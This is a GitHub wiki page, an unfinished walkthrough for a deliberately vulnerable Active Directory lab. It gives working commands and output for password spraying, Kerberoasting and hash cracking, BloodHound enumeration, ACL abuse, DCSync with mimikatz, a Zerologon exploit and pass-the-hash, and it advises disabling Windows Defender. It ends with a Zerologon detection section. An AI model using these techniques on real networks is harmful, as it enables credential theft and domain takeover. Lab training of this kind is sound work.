WIP for writeup - WaterExecution/vulnerable-AD-plus GitHub Wiki

Password Spraying

ldapsearch -h 10.10.10.100 -x -b "DC=change,DC=me" | grep -i "company default password"
description: Company default password(Reset ASAP)
...
sAMAccountName: nichole.janelle
# Gavrielle Guinna, Users, change.me
description: Company default password(Reset ASAP)
...
sAMAccountName: gavrielle.guinna

create a password list.

echo "change" >> potential.txt
hashcat -a 6 potential.txt ?d?d?d --force --stdout > password.txt

Using crackmapexec, you can bruteforce either accounts using a password list.

cme smb 10.10.10.100 -u nichole.janelle -p password.txt
cme smb 10.10.10.100 -u Gavrielle.Guinna -p password.txt
SMB         10.10.10.100    445    DC               [+] change.me\nichole.janelle:maxwell  
SMB         10.10.10.100    445    DC               [+] change.me\Gavrielle.Guinna:maxwell

Kerberoast

ldapsearch -h 10.10.10.100 -x -b "DC=change,DC=me" | grep -i service
servicePrincipalName: mssql_svc/mssqlserver.change.me
servicePrincipalName: http_svc/httpserver.change.me
servicePrincipalName: exchange_svc/exserver.change.me

Resetting user account

To use the account resetting will let us winrm. description: New user generated password: =W{Z5FM

smbpasswd -r 10.10.10.100 -U 'jessika.luella'

Kerberoasting

GetUserSPNs.py -request -dc-ip 10.10.10.100 change.me/jessika.luella

ServicePrincipalName             Name          MemberOf  PasswordLastSet             LastLogon  Delegation
-------------------------------  ------------  --------  --------------------------  ---------  ----------
mssql_svc/mssqlserver.change.me  mssql_svc               2021-06-16 23:28:33.186290  <never>
http_svc/httpserver.change.me    http_svc                2021-06-07 22:42:54.144313  <never>
exchange_svc/exserver.change.me  exchange_svc            2021-06-07 22:42:54.175986  <never>

$krb5tgs$23$*http_svc$CHANGE.ME$change.me/http_svc*$19f16990dec720eb65e2b788371bd87d$e9ede30981e8c512832deb5ad60719d5d0f72a2fa8c0d091d42f896cb9aa3dfde8e8c03ec0a637f
e0b16e969c157fc51b90b6f482b3a1006fe1649c06df17525c0fc79ebe53691914982c7fc431e8e1bbd4848ff21f37c6901c4732f51ae37848f2a36802518a60902f785a5e7d04c830cc3f27b031c37ebebc
5d29fe133ec57750e7ab108f0333ed101fa063b62f55ad9fc4ae757afad9ab54b66976840943d9f38f4a74b8d1c52ab3d5625c069ee9f72cbb046a7e2637fcf16989a990713871afe8c1d8877cda1dbd901c
27425630e1fbec72a3748652c003c4d28f706753194138bf45f64524fbd4ec2a5edbe6a75d6a929ddc563a11d87bf05d57e29543f01716a9064d813a92170d9aa167c8c69e49e915f49d67fe98673baa7426
16ce40dc7ffc4d8e9c609cfd2323958481942922d69a41b635a4c8b3994b1a3d4b985a298097bf55d64c351f10b3a0fed6e98235baf669c3a30ee18acac7cffd93587843e39bef05a2a3dd41fabe38b2efe9
a36791e809adf80cb5d10d014f34a54eeeade620d335a18e2ee0b6eb939ad47d272f0169b783980a817aff900fc4238fbb696578b6400a7ccaf2e4f64a55d10f6d2adb13ed9e32711ef4f3902e28afd0d338
1f825da24ed51580c6910cc40968596765bca0cc1adfd667292c57679a0b4bb65fa27fec70c2adfea5f29e4f0f0af9d7371086522220ad0ec1f17d4949bdd4907653c4f246350598bbf9f92249a18075b117
0558109707438364332196e774cedf0cef1137e7cd61dbb83296c4bda39c2e166b1450454b5d89ddb7f64674e6695be6e211b9ac9670be02a4b5e6cbf0f7e8f3ce3f89ebdaeb83e5fc4b16942ed8b5c53c02
74905610109edc12b5a5ff923c65b2e7371a1c378978ae4a81cc71b0490fe043c9d7edca4f0c7d530ac3214581c64c7dc6efafbd104c515564bf2e16a30dfe8d0055944f1dcd829ebe9c72cbfe8b5df79b3b
1deabe3743396d0a8ee291bb2379a5345e4859c50ed8bef07c528822588daebbf92aba7c3996d08b36b90b02b5b52946a56a4885eb9a3d8cc486a8df921037f0cd07bbf05e252a22030fd6a2a3b05d6a61da
877cc793f014ae3a12f60c05c531e3ae10a591bb68920a06627a0c4d0a6e9eeb6f83f31d96da757ab39985edc8f72584345a4bb45247d875b99220f37831406f9a8be817e59788d1f65d09ae4b68a7351db1
bafbcd905daa1be703690f39a9846b37050832a32189d31708a4b20ab9962664c748e8a846195a7f6c03d37fd5ff19e9b08e1a87f3aa0df621c9045735b278581b5b202032c5633f27c68f374776a9f1a919
93c2b37

Hashcat

hashcat.exe -m 13100 -a 0 hashes.txt password.txt
$krb5tgs$23$*http_svc$CHANGE.ME$change.me/http_svc*$afb105
fedd7b6bf5e44cdb9c926c23b6$80dac356f33a4f59bcaab494541e86a
7a4305bd55d6474c7f1e21d7dd0ab3841929d3ad5e081cd62cf964462c
1b95bae2876df643709afa701a69a2bc4be52158e52e45fcaa4641a06e
a74f5eb0a21d56c84542098629809529d378d8a98bf5686911e4942d0f
0a8d282ce9afa0bae2f1b70f580cfeaf2baca3b8fbbe8caa781f29031d
af74aebef5122ee7b7810465f6d8c764ff217fd7572e0d3d12a9d465818
df291d7aeabebcb501de79a46107b0ac345705e8a4ee271b5e5091e04ce
79287753939171d0258018afae691eb87b904d017249b7dcb37c2ccce76
9778ab54884df9c31447da2f48dd8e4c2eab1a261d214744a319d7d5100
798238d201af0016008f77cec049c1dfad1641df2e72e60dd3b495a34ab
194fdfcd4dc249a4e9b92bc4108230695eced5ee95506fdb550b1a4285f
a3cf0413073fbc626c1a53bfaac63c978ad6ee678a030bf596a3014337b
ee773e5e87c4937662dbd3e96b2bf468ab0b8965c8481f02b6f20b4f9f2
21dab91f3f466076d840179fdc882fb5fdb57535cc817a23d55f5e5ec94
39e625d6904754691e39b8eff13c12a0a6310c3a68878eb49ec6d88080c
b5029c827f29534c14f01f6d2080bb9996602960391babbbc3eec28cd81
293734284c0689115526b5454cbe949b1f69dceff586292e60ef2c4a838
ccd12cd1a68148be9c2560cc71c0074c9fdc94570e6ba4881fc2626ebc13
751efaa8338d6c49042a4ff1b725c0646c400511310f990aab3e826fb40
762aba74efa6989badf7bbfc168f969cad4259380b1d99e1bfca6135462a
d321062c25974235cf2ed09368d41f02688bcba16d2170203f9eb5bbe929
e1da21d49ca3b911fea1d258c3a177bb0887904c23a9ae88643cbbb6087e
b53a9175cb9c4b8334b64bc77917e290438e4916c480538c61744935c1dc
64a14eb3fa66e2c2e861f7ddd4ce566ff7604c550bf7597cce9bce039d83
1cef22b4a26fdf0687f9bc9d636df3719338170a63742a07eeab36d45f23
c29a4e3149124bf2e48f4543ff1f99071592a5556a932fc531d4ba2a390e
b1edfd5d9a18b88fb2c02a2056a3e576a95449548f01b6766e03a937b783
a45bdf6e2f09f3d87004122787f6100122775879b8851bc594bd71958c2a
1b215efb8a781de8a7d190f001670139c158080f3706bf316c51b68327f6
e7614a3224a49b35ba6c1ffae2f18d32a9f3651ed45453df1677ec9dd95b
e0ab5f1ab113976aeb9445f8fb2fdbf255ae59fd8ef4333a269b4771acd3
349ea22433fc8a2e330be4e974e3e4a926c5151bdef7f208824f8996154f
67a9799783e8a742fdb:mike

http_svc: mike

Privilege Escalation

Abusing ACLs/ACEs

Download: BloodHoundAD

Installation
sudo apt intsall neo4j
sudo neo4j console

Login to http://localhost:7474 (neo4j:neo4j)
*Prompt for password change*

./BloodHound --no-sandbox
Login with neo4j:password

Disable windows defender:

Download: SharpHound

description: Company default password(Reset ASAP)

Reset password - Password Spraying

smbpasswd -r 10.10.10.100 -U 'bibi.levon'

Remote login

evil-winrm -i 10.10.10.100 -u bibi.levon

Upload SharpHound

*Evil-WinRM* PS C:\Users\bibi.levon\appdata\Local\temp> upload SharpHound.exe

Run SharpHound

*Evil-WinRM* PS C:\Users\bibi.levon\appdata\Local\temp> .\SharpHound.exe
Output
----------------------------------------------
Initializing SharpHound at 2:15 AM on 6/9/2021
----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain CHANGE.ME using path CN=Schema,CN=Configuration,DC=change,DC=me
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 267 objects finished (+267 ì)/s -- Using 28 MB RAM
Enumeration finished in 00:00:00.6560165
Compressing data to .\20210609021515_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 2:15 AM on 6/9/2021! Happy Graphing!

Download SharpHound

*Evil-WinRM* PS C:\Users\bibi.levon\appdata\Local\temp> download 20210609021515_BloodHound.zip
Output
Info: Downloading C:\Users\bibi.levon\appdata\Local\temp\20210609021515_BloodHound.zip to 20210609021515_BloodHound.zip

                                                             
Info: Download successful!

Using BloodHound

Drag and drop the zip file into BloodHound

Search for users you have access to:

Right click and select "Mark User as Owned":

Select shortest paths to domain admins from owned principals:

Abuse DnsAdmins

sudo smbserver.py folder . -username user -password password -smb2support

*Evil-WinRM* PS C:\tmp> net use \\10.10.10.5\folder /user:user password

DCSync

Recon:

Using powerview & bloodhound we need to find accounts that we have initial access that are linked to accounts that have directory replication rights to do DCsync.

Initial Access

ldapsearch -h 10.10.10.100 -x -b "DC=change,DC=me"

output

description: Company default password(Reset ASAP)
sAMAccountName: sandy.morena

cme smb 10.10.10.100 -u sandy.morena -p ADpassword.txt

output

sandy.morena:change000

smbpasswd -r sandy.morena"
old password: change000
newpassword: 1234

evil-winrm -i 10.10.10.100 -u sandy.morena -p 1234

PowerSploit

Using powerview to see which accounts have "directory replication"

upload PowerView.ps1
import-module .\PowerView.ps1
Get-ObjectACL "DC=change,DC=me" -ResolveGUIDs | ? {($_.ObjectAceType -match 'Replication-Get')}

output

AceQualifier           : AccessAllowed                                                                  
ObjectDN               : DC=change,DC=me                                                                
ActiveDirectoryRights  : ExtendedRight                                                                  
ObjectAceType          : DS-Replication-Get-Changes-In-Filtered-Set                                                                                                             
SecurityIdentifier     : S-1-5-21-899434533-4132491356-2237190077-1657

Converting the SID to domain name (only works for actual accounts and not builtin accounts)

Get-ADUser -Identity S-1-5-21-899434533-4132491356-2237190077-1657

output:

DistinguishedName : CN=Filippa Claudina,CN=Users,DC=change,DC=me
Name              : Filippa Claudina
ObjectGUID        : 8aac2476-2c50-4e10-9487-2afae074f4c2
SamAccountName    : filippa.claudina
SID               : S-1-5-21-899434533-4132491356-2237190077-1657
Surname           : Claudina
UserPrincipalName : [email protected]

Hence we know that Filippa Claudina has directory replication rights.

Blood Hound

apt-get install bloodhound
apt-get install neo4j
neo4j start

upload SharpHound.exe
.\SharpHound.exe
download 0210912204149_BloodHound.zip

using the initial accessed account, i uploaded and executed bloodhound. FYI disable windows defedner and upload the zip file to bloodhound.

Using bloodhound i found out that sandy.morena has "WriteOwner" over Filippa.claudina (replication account).

Take note this may take a while to find an account linked to one of the replication account. I recommend using either password spraying or generated password accounts. If none of the accounts are linked you may need to rerun the script until you get one.

Privilege Escalation via ACL abuse

Upon finding "links" we can privilege escalate to the account via ACL abuse.

import PowerView.ps1

$SecPassword = ConvertTo-SecureString '1234' -AsPlainText -Force

$Cred = New-Object 
System.Management.Automation.PSCredential('change.me\sandy.morena', $SecPassword)

Set-DomainObjectOwner -Credential $Cred -Identity filippa.claudina -OwnerIdentity sandy.morena

Add-DomainObjectAcl -Credential $Cred -TargetIdentity filippa.claudina -PrincipalIdentity sandy.morena -Rights All
  1. import powerview
  2. set $secpassword as sandy.morena's password and encrypt it
  3. set $cred as sandy.morena with the encrypted password via system automation powershell credential
  4. Using the "writeOwner", i change the owner of filippa.claudina to sandy.morena using $cred
  5. I change sandy.morena's rights from "own" to "genericall"
net user filippa.claudina 1234 /domain
evil-winrm -i 10.10.10.100 -u filippa.claudina -p 1234

change filippa.claudian's password to 1234 and evil-winrm to the account

DCsync via mimikatz

upload mimikatz.exe
.\mimikatz.exe "lsadump::dcsync /user:krbtgt" exit

* SAM ACCOUNT **                                                                           
                                                                                            
SAM Username         : krbtgt                                                               
Account Type         : 30000000 ( USER_OBJECT )                                             
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )                           
Account expiration   :                                                                      
Password last change : 31/8/2021 6:36:24 PM                                                 
Object Security ID   : S-1-5-21-899434533-4132491356-2237190077-502                         
Object Relative ID   : 502                                                                  
                                                                                            
Credentials:                                                                                
  Hash NTLM: 1904f1e6c79caf1a92aab3bc1215da5c                                               
    ntlm- 0: 1904f1e6c79caf1a92aab3bc1215da5c                                               
    lm  - 0: 5281a28c7aa26b3ef017a47789107617               

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 7/6/2021 10:14:55 PM
Object Security ID   : S-1-5-21-899434533-4132491356-2237190077-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 92937945b518814341de3f726500d4ff

Silver Ticket (...)

Golden Ticket (...)

Pass-the-Hash (...)

Pass-the-Ticket (...)

SMB Signing Disabled

Bad WinRM permission

Public SMB Share

  1. (GPO) Accounts: Guest account status: Enabled
  2. (GPO) Network access: Let Everyone permissions apply to anonymous users: Enabled
  3. (GPO) Network access: Shares that can be accessed anonymously: C:\Common
  4. add "EVERYONE" to C:\Common
smbclient -L //10.10.10.100

smbclient -L //10.10.10.100
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Common          Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon 

smbclient -L //10.10.10.100/Commmon

smbclient //10.10.10.100/Common
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Aug 30 23:01:11 2021
  ..                                  D        0  Mon Aug 30 23:01:11 2021

                15570943 blocks of size 4096. 12464639 blocks available
smb: \>

Zerologon

Vulnerable Version

Windows Version OS Build
Windows Server 2019 OS Build 17763.1757
Windows Server 2016 OS Build 14393.4225
Windows Server 2012 KB4601384 update
Windows Server 2012 R2 KB4601384 update
Windows Server 2008 R2 KB4601347 update
Windows 10 18363.1377, 18362.1016, 19041.804, 19042.804

Get NetBIOS Name

nbtscan 10.10.10.100
IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
10.10.10.100     DC              <server>  <unknown>        00:0c:29:fd:4c:fb


Netbios name: WIN-E99S3QT2JTU

Running zerologon exploit

git clone https://github.com/risksense/zerologon.git
python3 set_empty_pw.py DC 10.10.10.100
Performing authentication attempts...
==========================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================
NetrServerAuthenticate3Response 
ServerCredential:               
    Data:                            b'\r9,I\xe6L\xbdE' 
NegotiateFlags:                  556793855 
AccountRid:                      1000 
ErrorCode:                       0 


server challenge b'\r\x0f\xad\xdd\xac\xf5\x9d\xb5'
NetrServerPasswordSet2Response 
ReturnAuthenticator:            
    Credential:                     
        Data:                            b"\x01F$=G\x8b'{" 
    Timestamp:                       0 
ErrorCode:                       0 



Success! DC should now have the empty string as its machine password.

Dumping all hashes in DC

secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'change.me/[email protected]'
Administrator:500:aad3b435b51404eeaad3b435b51404ee:92937945b518814341de3f726500d4ff:::                                                                                                        
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                                                
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be9be7863bd01ce4f7dc7b83b7729c2d:::                                                                                                               
change.me\jen.roobbie:1103:aad3b435b51404eeaad3b435b51404ee:6b0d51de7c9d0b788b5c4be4d58281a6:::                                                                                               
change.me\kevin.morissa:1104:aad3b435b51404eeaad3b435b51404ee:b5eea08f4e39fa88099444b8c03f309b::: 
...

Remote Logon using pass-the-hash attack

evil-winrm -i 10.10.10.100 -u administrator -H "92937945b518814341de3f726500d4ff"

Detection

Event Viewer

Event ID: 4624
Task Category: Logon
Logged: 11/6/2021 12:01:47 AM 
An account was successfully logged on.

Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Logon Information:
	Logon Type:		3
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		change\Administrator
	Account Name:		Administrator
	Account Domain:		change
	Logon ID:		0x1ECBD0
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Process Information:
	Process ID:		0x0
	Process Name:		-

Network Information:
	Workstation Name:	-
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		NtLmSsp 
	Authentication Package:	NTLM
	Transited Services:	-
	Package Name (NTLM only):	NTLM V2
	Key Length:		128

This event is generated when a logon session is created. It is generated on the computer that was accessed.

The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.

The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).

The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.

The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.

The impersonation level field indicates the extent to which a process in the logon session can impersonate.

The authentication information fields provide detailed information about this specific logon request.
	- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
	- Transited services indicate which intermediate services have participated in this logon request.
	- Package name indicates which sub-protocol was used among the NTLM protocols.
	- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.

Description: Relevant Event ID could include: 4624, 4742 & 5805 (for passsword changes) and 4672. Take note:

  1. Time of the event
  2. Source Network Address
  3. Source Port
  4. Authentication Package (NTLM/Kerberos)
  5. Logon Type: 3
  6. Account Name
  7. Security ID
Source: Sysmon
Event ID: 3
Task Category: Network connection Detected (rule: Network Connect)
Logged: 11/6/2021 12:01:47
Network connection detected:
RuleName: -
UtcTime: 2021-06-10 14:07:18.539
ProcessGuid: {cbc30ecf-aaae-60c1-0c00-000000000600}
ProcessId: 684
Image: C:\Windows\System32\lsass.exe
User: NT AUTHORITY\SYSTEM
Protocol: tcp
Initiated: false
SourceIsIpv6: false
SourceIp: 10.10.10.1
SourceHostname: -
SourcePort: 51583
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 10.10.10.100
DestinationHostname: DC.change.me
DestinationPort: 49670
DestinationPortName: -
Source: Sysmon
Event ID: 3
Task Category: Network connection Detected (rule: Network Connect)
Logged: 11/6/2021 12:01:47
Network connection detected:
RuleName: -
UtcTime: 2021-06-10 14:07:18.535
ProcessGuid: {cbc30ecf-aaaf-60c1-0f00-000000000600}
ProcessId: 960
Image: C:\Windows\System32\svchost.exe
User: NT AUTHORITY\NETWORK SERVICE
Protocol: tcp
Initiated: false
SourceIsIpv6: false
SourceIp: 10.10.10.1
SourceHostname: -
SourcePort: 51582
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 10.10.10.100
DestinationHostname: DC.change.me
DestinationPort: 135
DestinationPortName: epmap

Description: sysmon detects of a network connection. Take note of:

  1. Image C:\Windows\System32\svchost.exe & C:\Windows\System32\Isass.exe
  2. Time
  3. User
  4. Source IP

Wireshark

Description: by simply sending large number of Netlogon messages in which various fields are filled with zeroes, an attacker can change the computer password of the domain controller that is stored in the Active Directory Client Credential: 00000000000

Description: Do take note of multiple packets using prootcol RPC_NETLOGON & DCERPC with: Client Credential: 0000000000 Server Credential: 0000000000

Task manager / Resource Monitor

Description The attack could casue heavy network utilization. It also abuses lsass.exe for network contectivity.

Conclusion

We can conclude that on the 11/6/2021 around 12am, the administrator account was logged on. On Sysmon it stated that around the same timing, there was network connection. Image used were Isass.exe & svchost.exe. The source IP was 10.10.10.1. On Wireshark on the same timing, there were multiple packets with Client & Server Credential with multiple 0's using protocol RPC_NETLOGON and DCERPC. The source & Destination IP were 10.10.10.1. There was also a surge in network utilization during that period using Isass.exe. Therefore we can conclude that there were packets and logons using zerologon exploitation to have unauthorized logon on the administartor account.

PrintNightmare

HiveNightmare

⚠️ **GitHub.com Fallback** ⚠️